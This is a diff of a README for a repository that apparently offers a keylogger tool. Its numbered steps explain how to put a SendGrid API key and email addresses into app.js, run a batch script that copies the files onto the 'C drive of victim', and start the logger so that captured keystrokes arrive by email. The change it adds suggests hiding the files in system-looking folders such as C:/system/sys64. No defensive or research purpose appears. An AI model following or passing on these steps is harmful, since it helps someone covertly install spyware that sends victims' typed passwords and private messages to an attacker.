toastsandwich/keyLogger-Tool/README.md

 # 💾 guide :
 1. set-Up your sendGrid mail and just pust your key and mails in app.js.
 2. open powershell.
-3. run command "./dumpScript.bat" , with this your files are copied to C drive of victim.
+3. run command "./dumpScript.bat" , with this your files are copied to C drive of victim. change the locations in dumpScript.bat (use destination file as C:/temp/dumpStack or C:/system/sys64)
 4. Put the sendGrid APIKEY and your emails at the placeholder in app.js.
 5. run command "app.js".
 6. congratulations !!.
 Your keylogger has started and now you will recieve the mails.